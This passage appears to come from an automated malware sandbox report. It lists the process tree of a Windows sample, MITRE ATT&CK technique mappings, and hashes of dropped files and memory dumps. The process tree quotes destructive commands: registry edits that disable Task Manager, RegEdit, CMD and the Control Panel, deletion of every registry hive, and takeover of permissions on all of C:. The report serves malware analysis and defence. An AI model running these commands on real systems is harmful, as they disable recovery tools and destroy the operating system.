    3⤵
    PID:2264
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2336
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    PID:3908
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
    3⤵
    PID:4196
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    3⤵
    PID:4076
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:4720
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayItemsDisplay /t REG_DWORD /d 1 /f
    3⤵
    PID:5108
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:2384
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
    3⤵
    PID:4776
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CLASSES_ROOT /f
    3⤵
    PID:236
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER /f
    3⤵
    PID:1804
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE /f
    3⤵
    PID:1576
- - C:\Windows\system32\reg.exe
    reg delete HKEY_USERS /f
    3⤵
    PID:1544
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_CONFIG /f
    3⤵
    PID:3612
- - C:\Windows\system32\takeown.exe
    takeown /f C:\* /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4020
- - C:\Windows\system32\icacls.exe
    icacls C:\* /grant Administrators:F /t
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3100

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:2640

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:4556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:3668

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 MicrosoftWindows.Client.CBS_cw5n1h2txyewy
1⤵
PID:1572

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
1⤵
PID:3344

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1032

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3736

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
1⤵
PID:3984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
14KB

MD5
7d40af72b9810256c59774e3ab331303

SHA1
58a97a6b86f9b9111ef3ab1577b3bb2dbc805f81

SHA256
923c47e107609bfd829a3c44cc3fd0cc96b52d47de67c1855ee743a9917d1404

SHA512
d3cebdbd060b658de330e1792329b9cc6af20945da0cfea2666856f5fd7018574c58545739a52a6eb048c6b258d13711a82ce8801ea91184567c1741bf16c1f7

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
17KB

MD5
4507fdf3ef5f7584c4fbe0faccfba434

SHA1
e79b891fdbdc67a4432fc2aa4895889568d3a836

SHA256
b9cac20054e5dbdf48158c240a4c1d9e40f9864aa07d3fb9b75f809977688a4a

SHA512
1f20aed416ce7ba390b66cdb0f8dfda21c8b6475836bbc397ac2df42e61c2ca7697049f224703e7fc31b5c132e2d442db5e019076854eda37e8d61e1afee72ab

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\R2NW200R\www.bing[1].xml

Filesize
97B

MD5
53c14d16216dd0ab44e9264bf69fd824

SHA1
ae2c5efa8bbbcdd51acc1868625fc619b05795d7

SHA256
bfa4d37779b58ddec0003d312cff5e95da923b422b9a3d368d82a9c6e5bc0864

SHA512
6ce69044a0df72d68fb935b3961caac51ab5f19035a213eebc6c01f0d2eea8ddfbe64eb95d7bc052ec791bb82d634f8da28ac2af96ee415e06191ba76d7d59dd

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\R2NW200R\www.bing[1].xml

Filesize
328B

MD5
cff1b5ff47664705c0b3a4c3dd96f897

SHA1
7c45852429cbd8976f67407508344c69f1200468

SHA256
f845c9f747c5976c63e68f855d21e8cd6b60407b349c13329236101a1cce3115

SHA512
26fd93b656938c71939d637d78c9a75297938a789293840d1fa8156e9940cc2ee0c085213399de8ee67b9e7d71983c97afc74c0c2e466101163d8e2d5404eec3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\R2NW200R\www.bing[1].xml

Filesize
14KB

MD5
1a8ec26575e0f581074c16f116b4c352

SHA1
3e6091c3fd28fd93b92d52ce79bb67e3bb434bba

SHA256
85e0e69057b69b3a7a170afcbe762cc6e96a65a528b4600fa62f5fa581591d3a

SHA512
83cc549c0950adfba92924e54f8dd29ffeb1f338f0c28b6a99e02920fb52463683fe6d27ccee5091712d8b26c5161af9e0cb2844e4d7488e38e3b2182d119d35

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133720684143305569.txt.~tmp

Filesize
67KB

MD5
25f0ef172a904d2ac644763c35607212

SHA1
5677c4be5db5e9ed449c16a4c47df71d5aea4045

SHA256
f8a63098c5f65cab9cc5e2e4908ac96029e2769d395f63b121627c374a9db0fc

SHA512
e86981048162f2f8513150fce89186e2a7853eeaa9ba8e831567487c395fe13fa187c4bf0c6fb9930da8e1936e8733c821db8b7cb82b66709b3561516f769636

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchUnifiedTileModelCache.dat

Filesize
11KB

MD5
0baad14b6bcea1d60bde5910a7c81b6b

SHA1
34d7d1107ff683154c928c3906998fcb651aeba9

SHA256
a9bd49a69dea33f0f215df8ce5c86a817b7670a90212c102037bbf28f6190df8

SHA512
3e1f44f8804c7fe48b55a667d75c92b503ccbc85189d454c226f1a405c45a11db6a30dd05ce7873f51621c71351bb7f358d944324f6de88855a3774c696932a1

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchUnifiedTileModelCache.dat

Filesize
10KB

MD5
aa41fcff37e647d903027f883fe21d05

SHA1
07cfc810cf877c750d35dc52a41bed74cf55275e

SHA256
0050911b9e3cb24c184885e1e672c58b1f79f4d1eb002f8026af4d19ebdbc859

SHA512
fe416c51e721eb1f5184ffe546dc45fe2d86053f2edf2238fe951e9a068ae29ffb8602d98b4b4078c773b3e14a9b911a7fb6cd94e13fdde480dd51e2157a9638

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt

Filesize
846KB

MD5
766f5efd9efca73b6dfd0fb3d648639f

SHA1
71928a29c3affb9715d92542ef4cf3472e7931fe

SHA256
9111e9a5093f97e15510bf3d3dc36fd4a736981215f79540454ce86893993fdc

SHA512
1d4bb423d9cc9037f6974a389ff304e5b9fbd4bfd013a09d4ceeff3fd2a87ad81fe84b2ee880023984978391daf11540f353d391f35a4236b241ccced13a3434

Download Submit
memory/1032-119-0x000001FDE0400000-0x000001FDE0500000-memory.dmp

Filesize
1024KB

Download
memory/3668-50-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-63-0x00000286FF540000-0x00000286FF541000-memory.dmp

Filesize
4KB

Download
memory/3668-47-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-48-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-56-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-55-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-54-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-53-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-52-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-51-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-16-0x00000286FB180000-0x00000286FB190000-memory.dmp

Filesize
64KB

Download
memory/3668-49-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-57-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-58-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-59-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-60-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-61-0x00000286FF530000-0x00000286FF531000-memory.dmp

Filesize
4KB

Download
memory/3668-46-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-62-0x00000286FF530000-0x00000286FF531000-memory.dmp

Filesize
4KB

Download
memory/3668-64-0x00000286FF590000-0x00000286FF591000-memory.dmp

Filesize
4KB

Download
memory/3668-65-0x00000286FF590000-0x00000286FF591000-memory.dmp

Filesize
4KB

Download
memory/3668-45-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-44-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-43-0x00000286FF520000-0x00000286FF521000-memory.dmp

Filesize
4KB

Download
memory/3668-42-0x00000286FF500000-0x00000286FF501000-memory.dmp

Filesize
4KB

Download
memory/3668-0-0x00000286FB080000-0x00000286FB090000-memory.dmp

Filesize
64KB

Download
memory/3668-35-0x00000286FF3B0000-0x00000286FF3B1000-memory.dmp

Filesize
4KB

Download
memory/3668-40-0x00000286FF500000-0x00000286FF501000-memory.dmp

Filesize
4KB

Download
memory/3668-41-0x00000286FF500000-0x00000286FF501000-memory.dmp

Filesize
4KB

Download
memory/3668-39-0x00000286FF4F0000-0x00000286FF4F1000-memory.dmp

Filesize
4KB

Download
memory/3668-37-0x00000286FF4F0000-0x00000286FF4F1000-memory.dmp

Filesize
4KB

Download
memory/3736-133-0x000001F700FB0000-0x000001F700FB1000-memory.dmp

Filesize
4KB

Download
memory/3736-132-0x000001F700FB0000-0x000001F700FB1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads